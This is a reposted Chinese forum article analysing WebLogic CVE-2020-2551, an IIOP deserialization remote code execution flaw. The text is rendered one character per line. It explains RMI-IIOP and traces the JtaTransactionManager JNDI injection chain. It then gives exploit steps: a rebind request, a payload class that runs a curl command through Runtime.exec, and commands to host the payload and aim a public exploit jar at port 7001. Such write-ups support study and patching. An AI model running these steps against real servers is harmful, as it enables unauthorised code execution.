论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
逆向
[1081] 2020-03-11_WeblogicCVE-2020-2551IIOP协议反序列化RCE
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-16
逆向
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2020-03-11_WeblogicCVE-2020-2551IIOP协议反序列化RCE
W
e
b
l
o
g
i
c
C
V
E
-
2
0
2
0
-
2
5
5
1
I
I
O
P
协
议
反
序
列
化
R
C
E
C
h
a
B
u
g
运
营
小
哥
哥
C
h
a
B
u
g
2
0
2
0
-
0
3
-
1
1
I
I
O
P
协
议
导
致
的
反
序
列
化
。
环
境
w
e
b
l
o
g
i
c
1
0
.
3
.
6
+
j
d
k
1
.
6
i
d
e
a
+
j
d
k
1
.
8
+
j
d
k
1
.
6
I
I
O
P
I
I
O
P
,
I
n
t
e
r
n
e
t
I
n
t
e
r
-
O
R
B
P
r
o
t
o
c
o
l
(
互
联
网
内
部
对
象
请
求
代
理
协
议
)
,
它
是
一
个
用
于
C
O
R
B
A
2
.
0
及
兼
容
平
台
上
的
协
议
;
用
来
在
C
O
R
B
A
对
象
请
求
代
理
之
间
交
流
的
协
议
。
J
a
v
a
中
使
得
程
序
可
以
和
其
他
语
言
的
C
O
R
B
A
实
现
互
操
作
性
的
协
议
。
R
M
I
-
I
I
O
P
出
现
以
前
,
只
有
R
M
I
和
C
O
R
B
A
两
种
选
择
来
进
行
分
布
式
程
序
设
计
,
二
者
之
间
不
能
协
作
。
R
M
I
-
I
I
O
P
综
合
了
R
M
I
和
C
O
R
B
A
的
优
点
,
克
服
了
他
们
的
缺
点
,
使
得
程
序
员
能
更
方
便
的
编
写
分
布
式
程
序
设
计
,
实
现
分
布
式
计
算
。
R
M
I
-
I
I
O
P
综
合
了
R
M
I
的
简
单
性
和
C
O
R
B
A
的
多
语
言
性
兼
容
性
,
R
M
I
-
I
I
O
P
克
服
了
R
M
I
只
能
用
于
J
a
v
a
的
缺
点
和
C
O
R
B
A
的
复
杂
性
。
在
W
e
b
l
o
g
i
c
中
,
默
认
启
用
了
I
I
O
P
,
而
I
I
O
P
的
传
输
也
是
通
过
序
列
化
和
反
序
列
化
的
形
式
来
进
行
的
。
在
W
e
b
l
o
g
i
c
中
R
M
I
-
I
I
O
P
模
型
可
以
借
用
奇
安
信
观
星
实
验
室
的
一
张
图
来
说
明
I
I
O
P
样
例
先
来
看
一
个
简
单
的
R
M
I
-
I
I
O
P
样
例
,
具
体
代
码
可
以
看
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
l
o
n
g
o
f
o
/
r
m
i
-
j
n
d
i
-
l
d
a
p
-
j
r
m
p
-
j
m
x
-
j
m
s
p
a
c
k
a
g
e
c
o
m
.
l
o
n
g
o
f
o
.
e
x
a
m
p
l
e
;
i
m
p
o
r
t
j
a
v
a
x
.
n
a
m
i
n
g
.
C
o
n
t
e
x
t
;
i
m
p
o
r
t
j
a
v
a
x
.
n
a
m
i
n
g
.
I
n
i
t
i
a
l
C
o
n
t
e
x
t
;
i
m
p
o
r
t
j
a
v
a
x
.
n
a
m
i
n
g
.
N
a
m
i
n
g
E
x
c
e
p
t
i
o
n
;
i
m
p
o
r
t
j
a
v
a
.
u
t
i
l
.
H
a
s
h
t
a
b
l
e
;
p
u
b
l
i
c
c
l
a
s
s
H
e
l
l
o
S
e
r
v
e
r
{
p
u
b
l
i
c
f
i
n
a
l
s
t
a
t
i
c
S
t
r
i
n
g
J
N
D
I
_
F
A
C
T
O
R
Y
=
"
c
o
m
.
s
u
n
.
j
n
d
i
.
c
o
s
n
a
m
i
n
g
.
C
N
C
t
x
F
a
c
t
o
r
y
"
;
p
u
b
l
i
c
s
t
a
t
i
c
v
o
i
d
m
a
i
n
(
S
t
r
i
n
g
[
]
a
r
g
s
)
{
t
r
y
{
S
y
s
t
e
m
.
s
e
t
P
r
o
p
e
r
t
y
(
"
j
a
v
a
.
r
m
i
.
s
e
r
v
e
r
.
c
o
d
e
b
a
s
e
"
,
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
0
0
0
/
"
)
;
/
/
实
例
化
H
e
l
l
o
s
e
r
v
a
n
t
H
e
l
l
o
I
m
p
l
h
e
l
l
o
R
e
f
=
n
e
w
H
e
l
l
o
I
m
p
l
(
)
;
/
/
使
用
J
N
D
I
在
命
名
服
务
中
发
布
引
用
I
n
i
t
i
a
l
C
o
n
t
e
x
t
i
n
i
t
i
a
l
C
o
n
t
e
x
t
=
g
e
t
I
n
i
t
i
a
l
C
o
n
t
e
x
t
(
"
i
i
o
p
:
/
/
1
2
7
.
0
.
0
.
1
:
1
0
5
0
"
)
;
i
n
i
t
i
a
l
C
o
n
t
e
x
t
.
r
e
b
i
n
d
(
"
H
e
l
l
o
S
e
r
v
i
c
e
"
,
h
e
l
l
o
R
e
f
)
;
S
y
s
t
e
m
.
o
u
t
.
p
r
i
n
t
l
n
(
"
H
e
l
l
o
S
e
r
v
e
r
R
e
a
d
y
.
.
.
"
)
;
T
h
r
e
a
d
.
c
u
r
r
e
n
t
T
h
r
e
a
d
(
)
.
j
o
i
n
(
)
;
}
c
a
t
c
h
(
E
x
c
e
p
t
i
o
n
e
x
)
{
e
x
.
p
r
i
n
t
S
t
a
c
k
T
r
a
c
e
(
)
;
}
}
p
r
i
v
a
t
e
s
t
a
t
i
c
I
n
i
t
i
a
l
C
o
n
t
e
x
t
g
e
t
I
n
i
t
i
a
l
C
o
n
t
e
x
t
(
S
t
r
i
n
g
u
r
l
)
t
h
r
o
w
s
N
a
m
i
n
g
E
x
c
e
p
t
i
o
n
{
H
a
s
h
t
a
b
l
e
e
n
v
=
n
e
w
H
a
s
h
t
a
b
l
e
(
)
;
e
n
v
.
p
u
t
(
C
o
n
t
e
x
t
.
I
N
I
T
I
A
L
_
C
O
N
T
E
X
T
_
F
A
C
T
O
R
Y
,
J
N
D
I
_
F
A
C
T
O
R
Y
)
;
e
n
v
.
p
u
t
(
C
o
n
t
e
x
t
.
P
R
O
V
I
D
E
R
_
U
R
L
,
u
r
l
)
;
r
e
t
u
r
n
n
e
w
I
n
i
t
i
a
l
C
o
n
t
e
x
t
(
e
n
v
)
;
}
}
S
e
r
v
e
r
端
通
过
I
n
i
t
i
a
l
C
o
n
t
e
x
t
拿
到
上
下
文
,
然
后
注
册
一
个
H
e
l
l
o
S
e
r
v
i
c
e
对
应
h
e
l
l
o
R
e
f
引
用
,
而
H
e
l
l
o
I
m
p
l
又
实
现
了
H
e
l
l
o
I
n
t
e
r
f
a
c
e
接
口
,
其
中
有
一
个
s
a
y
H
e
l
l
o
方
法
并
且
继
承
j
a
v
a
.
r
m
i
.
R
e
m
o
t
e
抛
出
j
a
v
a
.
r
m
i
.
R
e
m
o
t
e
E
x
c
e
p
t
i
o
n
,
这
部
分
其
实
和
R
M
I
是
大
同
小
异
的
,
在
我
的
其
他
文
章
中
介
绍
过
了
R
M
I
,
这
里
不
再
赘
述
。
漏
洞
分
析
现
在
我
们
来
看
这
个
漏
洞
。
I
I
O
P
传
输
的
过
程
中
会
自
动
序
列
化
和
反
序
列
化
,
那
么
我
们
可
以
通
过
向
服
务
器
7
0
0
1
端
口
发
送
一
个
恶
意
的
序
列
化
对
象
,
I
I
O
P
达
到
R
C
E
。
发
送
恶
意
序
列
化
对
象
的
过
程
,
其
实
就
是
b
i
n
d
的
过
程
,
由
此
我
们
可
以
构
造
请
求
H
a
s
h
t
a
b
l
e
<
S
t
r
i
n
g
,
S
t
r
i
n
g
>
e
n
v
=
n
e
w
H
a
s
h
t
a
b
l
e
<
S
t
r
i
n
g
,
S
t
r
i
n
g
>
(
)
;
/
/
a
d
d
w
l
s
s
e
r
v
e
r
/
s
e
r
v
e
r
/
l
i
b
/
w
e
b
l
o
g
i
c
.
j
a
r
t
o
c
l
a
s
s
p
a
t
h
,
e
l
s
e
w
i
l
l
e
r
r
o
r
.
e
n
v
.
p
u
t
(
"
j
a
v
a
.
n
a
m
i
n
g
.
f
a
c
t
o
r
y
.
i
n
i
t
i
a
l
"
,
"
w
e
b
l
o
g
i
c
.
j
n
d
i
.
W
L
I
n
i
t
i
a
l
C
o
n
t
e
x
t
F
a
c
t
o
r
y
"
)
;
e
n
v
.
p
u
t
(
"
j
a
v
a
.
n
a
m
i
n
g
.
p
r
o
v
i
d
e
r
.
u
r
l
"
,
r
h
o
s
t
)
;
C
o
n
t
e
x
t
c
o
n
t
e
x
t
=
n
e
w
I
n
i
t
i
a
l
C
o
n
t
e
x
t
(
e
n
v
)
;
/
/
g
e
t
O
b
j
e
c
t
t
o
D
e
s
e
r
i
a
l
i
z
e
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
j
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
=
n
e
w
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
(
)
;
j
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
.
s
e
t
U
s
e
r
T
r
a
n
s
a
c
t
i
o
n
N
a
m
e
(
r
m
i
u
r
l
)
;
R
e
m
o
t
e
r
e
m
o
t
e
=
c
r
e
a
t
e
M
e
m
o
i
t
i
z
e
d
P
r
o
x
y
(
c
r
e
a
t
e
M
a
p
(
"
p
w
n
e
d
"
+
S
y
s
t
e
m
.
n
a
n
o
T
i
m
e
(
)
,
j
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
)
,
R
e
m
o
t
e
.
c
l
a
s
s
)
;
c
o
n
t
e
x
t
.
r
e
b
i
n
d
(
"
Y
4
e
r
"
+
S
y
s
t
e
m
.
n
a
n
o
T
i
m
e
(
)
,
r
e
m
o
t
e
)
;
你
肯
定
疑
惑
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
和
w
e
b
l
o
g
i
c
.
j
n
d
i
.
W
L
I
n
i
t
i
a
l
C
o
n
t
e
x
t
F
a
c
t
o
r
y
是
从
哪
来
的
?
1
.
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
是
s
p
r
i
n
g
爆
出
的
一
个
可
以
J
N
D
I
注
入
的
类
,
在
w
e
b
l
o
g
i
c
中
也
存
在
。
2
.
w
e
b
l
o
g
i
c
.
j
n
d
i
.
W
L
I
n
i
t
i
a
l
C
o
n
t
e
x
t
F
a
c
t
o
r
y
是
w
e
b
l
o
g
i
c
的
J
N
D
I
工
厂
类
。
国
际
惯
例
,
跟
一
下
流
程
,
I
I
O
P
解
析
数
据
流
的
部
分
看
不
懂
不
跟
了
,
从
I
I
O
P
开
始
反
序
列
化
对
象
开
始
E
:
/
s
o
u
r
c
e
/
j
a
v
a
/
W
e
b
l
o
g
i
c
/
s
r
c
/
m
a
i
n
/
r
e
s
o
u
r
c
e
s
/
l
i
b
/
m
o
d
u
l
e
s
/
w
e
b
l
o
g
i
c
.
j
a
r
!
/
w
e
b
l
o
g
i
c
/
i
i
o
p
/
I
I
O
P
I
n
p
u
t
S
t
r
e
a
m
.
c
l
a
s
s
:
1
7
2
5
此
时
v
a
r
2
是
序
列
化
传
入
的
,
跟
进
r
e
a
d
V
a
l
u
e
(
)
c
o
m
.
b
e
a
.
c
o
r
e
.
r
e
p
a
c
k
a
g
e
d
.
s
p
r
i
n
g
f
r
a
m
e
w
o
r
k
.
t
r
a
n
s
a
c
t
i
o
n
.
j
t
a
.
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
跟
进
r
e
a
d
V
a
l
u
e
D
a
t
a
(
)
,
判
断
是
否
有
r
e
a
d
O
b
j
e
c
t
方
法
之
后
进
入
自
身
的
r
e
a
d
O
b
j
e
c
t
(
)
,
也
就
是
的
r
e
a
d
O
b
j
e
c
t
然
后
通
过
反
射
调
用
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
的
r
e
a
d
O
b
j
e
c
t
(
)
,
跟
进
到
此
之
后
就
是
W
e
b
l
o
g
i
c
的
C
V
E
-
2
0
1
8
-
3
1
9
1
s
p
r
i
n
g
J
N
D
I
注
入
了
,
简
单
来
说
就
是
l
o
o
k
u
p
(
)
的
参
数
可
控
,
导
致
可
以
加
载
任
意
类
。
我
们
继
续
跟
进
i
n
i
t
U
s
e
r
T
r
a
n
s
a
c
t
i
o
n
A
n
d
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
(
)
o
m
.
b
e
a
.
c
o
r
e
.
r
e
p
a
c
k
a
g
e
d
.
s
p
r
i
n
g
f
r
a
m
e
w
o
r
k
.
t
r
a
n
s
a
c
t
i
o
n
.
j
t
a
.
J
t
a
T
r
a
n
s
a
c
t
i
o
n
M
a
n
a
g
e
r
如
果
u
s
e
r
T
r
a
n
s
a
c
t
i
o
n
等
于
空
有
u
s
e
r
T
r
a
n
s
a
c
t
i
o
n
N
a
m
e
属
性
则
进
入
l
o
o
k
u
p
U
s
e
r
T
r
a
n
s
a
c
t
i
o
n
(
)
,
跟
进
此
时
l
o
o
k
u
p
(
)
参
数
可
控
l
o
o
k
u
p
加
载
我
们
的
R
M
I
服
务
,
可
以
注
入
恶
意
i
p
的
r
m
i
服
务
,
触
发
实
例
化
恶
意
类
构
造
方
法
调
用
。
如
果
不
明
白
请
参
考
文
末
的
《
S
p
r
i
n
g
f
r
a
m
e
w
o
r
k
反
序
列
化
的
漏
洞
》
以
及
《
w
e
b
l
o
g
i
c
之
C
V
E
-
2
0
1
8
-
3
1
9
1
漏
洞
分
析
》
。
漏
洞
利
用
G
i
t
h
u
b
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
Y
4
e
r
/
C
V
E
-
2
0
2
0
-
2
5
5
1
下
载
j
a
r
包
,
然
后
使
用
m
a
r
s
h
a
l
s
e
c
起
一
个
恶
意
的
R
M
I
服
务
,
本
地
编
译
一
个
e
x
p
.
j
a
v
a
p
a
c
k
a
g
e
p
a
y
l
o
a
d
;
i
m
p
o
r
t
j
a
v
a
.
i
o
.
I
O
E
x
c
e
p
t
i
o
n
;
p
u
b
l
i
c
c
l
a
s
s
e
x
p
{
p
u
b
l
i
c
e
x
p
(
)
{
S
t
r
i
n
g
c
m
d
=
"
c
u
r
l
h
t
t
p
:
/
/
1
7
2
.
1
6
.
1
.
1
/
s
u
c
c
e
s
s
"
;
t
r
y
{
R
u
n
t
i
m
e
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
c
m
d
)
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
;
}
c
a
t
c
h
(
I
O
E
x
c
e
p
t
i
o
n
e
)
{
e
.
p
r
i
n
t
S
t
a
c
k
T
r
a
c
e
(
)
;
}
}
}
尽
量
使
用
和
尽
量
使
用
和
w
e
b
l
o
g
i
c
相
同
的
版
本
编
译
相
同
的
版
本
编
译
然
后
本
地
起
一
个
w
e
b
服
务
器
命
令
行
运
行
j
a
r
包
实
际
效
果
如
图
参
考
链
接
p
y
t
h
o
n
-
m
h
t
t
p
.
s
e
r
v
e
r
-
-
b
i
n
d
0
.
0
.
0
.
0
8
0
j
a
v
a
-
j
a
r
w
e
b
l
o
g
i
c
_
C
V
E
_
2
0
2
0
_
2
5
5
1
.
j
a
r
1
7
2
.
1
6
.
1
.
1
2
8
7
0
0
1
r
m
i
:
/
/
1
7
2
.
1
6
.
1
.
1
:
1
0
9
9
/
e
x
p
1
.
h
t
t
p
s
:
/
/
p
a
p
e
r
.
s
e
e
b
u
g
.
o
r
g
/
1
1
3
0
2
.
h
t
t
p
s
:
/
/
s
e
a
i
i
-
b
l
o
g
.
c
o
m
/
i
n
d
e
x
.
p
h
p
/
2
0
1
9
/
1
2
/
2
9
/
9
2
.
h
t
m
l
3
.
h
t
t
p
s
:
/
/
w
w
w
.
a
n
q
u
a
n
k
e
.
c
o
m
/
p
o
s
t
/
i
d
/
1
9
7
6
0
5
4
.
h
t
t
p
s
:
/
/
w
w
w
.
c
n
b
l
o
g
s
.
c
o
m
/
a
f
a
n
t
i
/
p
/
1
0
2
5
6
8
4
3
.
h
t
m
l
5
.
h
t
t
p
s
:
/
/
w
w
w
.
c
n
b
l
o
g
s
.
c
o
m
/
a
f
a
n
t
i
/
p
/
1
0
1
9
3
1
6
9
.
h
t
m
l
6
.
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
Y
4
e
r
/
C
V
E
-
2
0
2
0
-
2
5
5
1
7
.
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
l
o
n
g
o
f
o
/
r
m
i
-
j
n
d
i
-
l
d
a
p
-
j
r
m
p
-
j
m
x
-
j
m
s
8
.
h
t
t
p
s
:
/
/
p
a
p
e
r
.
s
e
e
b
u
g
.
o
r
g
/
1
1
0
5
/
9
.
h
t
t
p
s
:
/
/
p
a
p
e
r
.
s
e
e
b
u
g
.
o
r
g
/
1
0
9
1
/
文
笔
垃
圾
,
措
辞
轻
浮
,
内
容
浅
显
,
操
作
生
疏
。
不
足
之
处
欢
迎
大
师
傅
们
指
点
和
纠
正
,
感
激
不
尽
。
文
笔
垃
圾
,
措
辞
轻
浮
,
内
容
浅
显
,
操
作
生
疏
。
不
足
之
处
欢
迎
大
师
傅
们
指
点
和
纠
正
,
感
激
不
尽
。
看
完
了
就
点
个
关
注
呗
!
看
完
了
就
点
个
关
注
呗
!
❤
❤
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
逆向